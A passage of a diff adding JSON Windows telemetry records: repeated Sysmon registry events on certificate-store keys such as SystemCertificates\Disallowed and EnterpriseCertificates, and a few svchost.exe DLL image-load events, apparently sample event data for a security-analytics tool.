"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AppXDeploymentClient.dll", + "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", 
+ "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "StateRepository.Core.dll", + "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 